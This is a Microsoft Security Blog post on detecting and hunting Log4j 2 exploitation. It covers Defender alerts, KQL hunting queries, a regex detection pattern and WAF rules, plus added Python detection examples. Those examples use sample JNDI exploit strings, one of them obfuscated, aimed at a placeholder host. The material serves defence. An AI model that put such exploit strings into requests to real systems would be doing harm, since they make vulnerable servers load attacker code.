[Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more 
payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. 
These alerts are supported on both Windows and Linux platforms:

* **Log4j exploitation detected** - detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
* **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) - detects coin miners, shells, backdoors, and payloads such as Cobalt Strike used by attackers post-exploitation
* **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity

The following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don't necessarily indicate successful exploitation:

* **Possible target of Log4j exploitation** - detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _received by_ this device
* **Possible target of Log4j vulnerability scanning** - detects a possible _attempt to scan_ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device
* **Possible source of Log4j exploitation** - detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _initiated from_ this device
* **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation
* **Possible Log4j exploitation (CVE-2021-44228)** - inactive; initially covered several of the above, now replaced with more specific titles

The following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:

* Suspicious remote PowerShell execution
* Download of file associated with digital currency mining
* Process associated with digital currency mining
* Cobalt Strike command and control detected
* Suspicious network traffic connection to C2 Server
* Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Some of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.

_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_

#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)

Microsoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:

* Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))

_Figure 15. Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-44228)"_

#### Microsoft Defender for Office 365

To add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the "jndi" string in email headers or the sender email address field), which are moved to the Junk folder.

We also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:

* Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt - Email Headers (CVE-2021-44228))

_Figure 16. Sample alert on malicious sender display name found in email correspondence_

This detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.

_Figure 17. Sample email with malicious sender display name_

In addition, this email event can also be surfaced via advanced hunting:

_Figure 18. Sample email event surfaced via advanced hunting_

#### Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

**Possible malicious indicators in cloud application events**

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application, or Account name. The hits returned from this query are most likely unsuccessful attempts; however, the results can be useful to identify attackers' details such as IP address, payload string, download URL, etc.

```kusto
CloudAppEvents
| where Timestamp > datetime("2021-12-09")
| where UserAgent contains "jndi:"
    or AccountDisplayName contains "jndi:"
    or Application contains "jndi:"
    or AdditionalFields contains "jndi:"
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields
```

**Alerts related to Log4j vulnerability**

This query looks for alert activity pertaining to the Log4j vulnerability.

```kusto
AlertInfo
| where Title in~('Suspicious script launched',
    'Exploitation attempt against Log4j (CVE-2021-44228)',
    'Suspicious process executed by a network service',
    'Possible target of Log4j exploitation (CVE-2021-44228)',
    'Possible target of Log4j exploitation',
    'Possible Log4j exploitation',
    'Network connection seen in CVE-2021-44228 exploitation',
    'Log4j exploitation detected',
    'Possible exploitation of CVE-2021-44228',
    'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
    'Possible source of Log4j exploitation',
    'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
    'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
    )
```

**Devices with Log4j vulnerability alerts and additional other alert-related context**

This query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device.

```kusto
// Get any devices with Log4J related Alert Activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
    'Exploitation attempt against Log4j (CVE-2021-44228)',
    'Suspicious process executed by a network service',
    'Possible target of Log4j exploitation (CVE-2021-44228)',
    'Possible target of Log4j exploitation',
    'Possible Log4j exploitation',
    'Network connection seen in CVE-2021-44228 exploitation',
    'Log4j exploitation detected',
    'Possible exploitation of CVE-2021-44228',
    'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
    'Possible source of Log4j exploitation',
    'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
    'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
    )
// Join in evidence information
| join AlertEvidence on AlertId
| where DeviceId != ""
| summarize by DeviceId, Title;
// Get additional alert activity for each device
AlertEvidence
| where DeviceId in(DevicesLog4JAlerts)
// Add additional info
| join kind=leftouter AlertInfo on AlertId
| summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)
```

**Suspected exploitation of Log4j vulnerability**

This query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.

```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
// Removing FPs
| where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))
```

**Regex to identify malicious exploit string**

This query looks for the malicious string needed to exploit this vulnerability.

```kusto
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
    or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
```

**Suspicious process event creation from VMWare Horizon TomcatService**

This query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName has "ws_TomcatService.exe"
| where FileName != "repadmin.exe"
```

**Suspicious JScript staging comment**

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications.
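The "Regex to identify malicious exploit string" query earlier in this section, the `jndi:` substring checks in the cloud application query, and the email-header detection all rest on the same idea: normalize the observed field, then look for a JNDI lookup string. The Python below is an added example and not code from the Microsoft post or its products. It runs that matching over constructed sample events (a cloud-app user agent, an email sender display name, and two benign process command lines) and first collapses the nested `${name:value}` lookups that the page's regex tolerates, so a split-up string is caught along with the plain one. The table and field names, the sample values, and the placeholder hostname are assumptions made for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# JNDI transports enumerated by the blog's own KQL regex.
SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "http", "https")

# Nested lookup of the form ${name:value} (letters only on both sides), the
# shape the page's regex allows inside the exploit string. Collapsing it to its
# value turns an obfuscated string such as ${${lower:j}ndi:...} into ${jndi:...}.
NESTED_LOOKUP = re.compile(r"\$\{[a-z]{1,20}:([a-z]{1,20})\}")

# Plain exploit string: ${jndi:<scheme>://<endpoint>...}
JNDI_PATTERN = re.compile(r"\$\{jndi:(" + "|".join(SCHEMES) + r")://([^/}\s]+)")


def normalize(value: str, max_rounds: int = 10) -> str:
    """Lower-case the value and collapse nested ${name:value} lookups.

    The loop is bounded so a pathological input cannot spin forever.
    """
    current = value.lower()
    for _ in range(max_rounds):
        collapsed = NESTED_LOOKUP.sub(lambda m: m.group(1), current)
        if collapsed == current:
            break
        current = collapsed
    return current


@dataclass(frozen=True)
class Finding:
    source: str    # table the event came from (assumed names)
    field: str     # which field carried the lookup string
    scheme: str    # JNDI transport requested
    endpoint: str  # host[:port] the victim would be made to contact


def scan_event(source: str, fields: dict[str, str]) -> list[Finding]:
    """Return one Finding per JNDI lookup string found in any field of the event."""
    findings: list[Finding] = []
    for name, value in fields.items():
        for match in JNDI_PATTERN.finditer(normalize(value)):
            findings.append(Finding(source, name, match.group(1), match.group(2)))
    return findings


def scan_events(events: list[tuple[str, dict[str, str]]]) -> list[Finding]:
    """Scan a batch of (source, fields) pairs, preserving input order."""
    return [f for source, fields in events for f in scan_event(source, fields)]


# Constructed sample events; the hostname is a placeholder, not a real indicator.
SAMPLE_EVENTS: list[tuple[str, dict[str, str]]] = [
    # cloud-app event with the plain exploit string in the User-Agent header
    ("CloudAppEvents", {"UserAgent": "${jndi:ldap://lookup-host.example:1389/a}",
                        "AccountDisplayName": "alice"}),
    # email with a nested-lookup variant in the sender display name
    ("EmailEvents", {"SenderDisplayName": "${${lower:j}ndi:${lower:r}mi://lookup-host.example/x}"}),
    # process start that only mentions a Log4j mitigation property (benign)
    ("DeviceProcessEvents", {"ProcessCommandLine": "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar"}),
    # ordinary browser user agent (benign)
    ("CloudAppEvents", {"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}),
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Running the block reports two findings (the user agent and the display name) and nothing for the two benign events; the endpoint captured in each finding is what an analyst would pivot on next, the same "attackers' details" the cloud application query description mentions.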
Hits from this query warrant further investigation to determine whether they are in fact related to a vulnerable Log4j application.

```kusto
DeviceProcessEvents
| where FileName has "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
```

**Suspicious PowerShell curl flags**

This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the "Body" argument are Base64-encoded results from an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

```kusto
DeviceProcessEvents
| where FileName has "powershell.exe"
| where ProcessCommandLine has_all("-met", "POST", "-Body")
```

### Microsoft Defender for Cloud

Microsoft Defender for Cloud's threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows:

* Detected obfuscated command line
* Suspicious use of PowerShell detected

On Linux:

* Suspicious file download
* Possible Cryptocoinminer download detected
* Process associated with digital currency mining detected
* Potential crypto coin miner started
* A history file has been cleared
* Suspicious Shell Script Detected
* Suspicious domain name reference
* Digital currency mining related behavior detected
* Behavior similar to common Linux bots detected

### Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).

_Figure 19. Microsoft Defender for IoT alert_

The package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (click _Updates_, then _Download file_; MD5: 4fbc673742b9ca51a9721c682f404c41).

_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release; [click here](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>) for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).

### Microsoft Sentinel

A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.

_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_

To deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**.
Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).

_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_

Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.

#### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection queries to look for this activity:

* [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

* [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)

This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.

* [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving the Log4j vulnerability.

* [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)

This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.

* [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in the Log4j component of Apache to evade detection and stay persistent, or for further exploitation in the network.

* [Azure WAF matching for CVE-2021-44228 Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)

This query alerts on a positive pattern match by Azure WAF for a CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.

* [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)

This hunting query helps detect suspicious Base64-encoded obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used alongside the Log4j vulnerability in order to evade detection and stay persistent in the network.

* [Linux security-related process termination activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)

This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in exploitation of the CVE-2021-44228 vulnerability.

* [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)

This query uses syslog data to alert on any suspicious manipulation of the firewall to evade defenses. Attackers often perform such operations, as seen recently in exploitation of the CVE-2021-44228 vulnerability, for C2 communications or exfiltration.

* [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)

This query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempts based on user agent pattern.

* [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)

This hunting query looks for connections to the LDAP port to find possible exploitation attempts for CVE-2021-44228.

* [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)

This query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability.

* [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)

This query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.

* [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)

This query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe.
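The baseline logic behind the "Network connection to new external LDAP server" query, as an added example written in Python rather than as the Sentinel query itself (this is not Microsoft's code): it splits constructed connection records into a 14-day baseline and a query window, then flags LDAP-port connections in the window whose external destination received no LDAP connection during the baseline. The record layout, the internal address ranges, the port list and the sample addresses are assumptions; swap in your own log schema and address space.

```python
from __future__ import annotations

import ipaddress
from datetime import datetime, timedelta

# Standard LDAP and LDAPS ports; the Sentinel query keys on the LDAP port, so a
# server listening elsewhere needs a protocol-based signal instead of this check.
LDAP_PORTS = {389, 636}

# Address space treated as internal (assumed; use your organization's own ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

BASELINE_DAYS = 14

# Constructed records: (timestamp, source host, destination IP, destination port).
# The destination addresses come from documentation ranges; they are not indicators.
SAMPLE_CONNECTIONS = [
    ("2021-11-28T09:00:00", "app-01", "203.0.113.10", 389),    # in baseline: known server
    ("2021-12-10T14:00:00", "app-01", "203.0.113.10", 389),    # window, known: not flagged
    ("2021-12-10T14:05:00", "app-01", "198.51.100.77", 1389),  # window, not an LDAP port: ignored
    ("2021-12-10T14:06:00", "app-02", "198.51.100.77", 389),   # window, new external: flagged
    ("2021-12-10T14:07:00", "app-02", "10.0.0.5", 389),        # window, internal DC: ignored
    ("2021-11-20T10:00:00", "app-03", "192.0.2.9", 636),       # before the baseline: does not count
    ("2021-12-10T15:00:00", "app-03", "192.0.2.9", 636),       # window, unseen in 14 days: flagged
]


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_new_external_ldap_servers(connections, window_start: datetime,
                                   window_end: datetime, baseline_days: int = BASELINE_DAYS):
    """Return window-period LDAP connections to external IPs not seen in the baseline."""
    baseline_start = window_start - timedelta(days=baseline_days)

    # Destinations that received an LDAP connection during the baseline period.
    known: set[str] = set()
    for ts, _src, dst, port in connections:
        when = datetime.fromisoformat(ts)
        if port in LDAP_PORTS and baseline_start <= when < window_start:
            known.add(dst)

    flagged = []
    for record in connections:
        ts, _src, dst, port = record
        when = datetime.fromisoformat(ts)
        if not (window_start <= when <= window_end) or port not in LDAP_PORTS:
            continue
        if is_internal(dst) or dst in known:
            continue
        flagged.append(record)
    return flagged


def run_sample():
    """Apply the check to the constructed records for a one-day window on 2021-12-10."""
    return find_new_external_ldap_servers(
        SAMPLE_CONNECTIONS, datetime(2021, 12, 10), datetime(2021, 12, 11))


if __name__ == "__main__":
    for ts, src, dst, port in run_sample():
        print(f"{ts} {src} -> {dst}:{port}  first LDAP connection to this external host "
              f"in {BASELINE_DAYS} days")
```

Two of the constructed records are flagged: the destination app-02 contacts has never been seen, and the one app-03 contacts was last seen before the 14-day baseline began. Because the check keys on the LDAP port, it complements rather than replaces the exploit-string hunting queries earlier in this post.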
A first-seen external LDAP destination could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.

### Azure Firewall Premium

Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included the CVE-2021-44228 vulnerability for different scenarios, including UDP, TCP, and HTTP/S protocols, since December 10th, 2021. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.

**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against the **CVE-2021-44228** exploit.

_Figure 23. Azure Firewall Premium portal_

Customers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>).
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).

### Azure Web Application Firewall (WAF)

In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1, available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1, available for Azure Application Gateway V2 regional deployments.

To help detect and mitigate the Log4Shell vulnerability by inspecting requests' headers, URI, and body, we have released the following:

* For Azure Front Door deployments, we have updated the rule **944240 "Remote Command Execution"** under Managed Rules
* For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules

These rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.

**Recommendation**: Customers are recommended to enable a WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2, to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required.

_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1_

_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_

Note: The above protection is also available on the Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.

More information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).

## Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

#### Revision history

**[01/19/2022]** _New information about an unrelated vulnerability we discovered while investigating Log4j attacks_

**[01/11/2022]** _New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries_

**[01/10/2022]** _Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_

**[01/07/2022]** _Added a new rule group in Azure Web Application Firewall (WAF)_

**[12/27/2021]** _New capabilities in threat and vulnerability management, including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._

**[12/22/2021]** _Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._

**[12/21/2021]** _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._

**[12/17/2021]** _New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._

**[12/16/2021]** _New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._

**[12/15/2021]** _Details about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._

**[12/14/2021]** _New insights about multiple threat actors taking advantage of this vulnerability, including nation-state actors and access brokers linked to ransomware._

The post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

ID MSSECURE:42ECD98DCF925DC4063DE66F75FB5433 Type mssecure Published 2021-12-12T05:29:03 Modified 2021-12-12T05:29:03
Title: Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Href: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
CVSS v3.1: 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (exploitability 3.9, impact 6.0)
CVSS v2: 10.0 HIGH, AV:N/AC:L/Au:N/C:C/I:C/A:C (exploitability 10.0, impact 10.0)
CVE list: CVE-2021-26084, CVE-2021-34473, CVE-2021-35247, CVE-2021-44228, CVE-2021-4428, CVE-2021-44428, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105

Lastseen 2022-05-09T15:51:15
Description
Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone.
Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. 
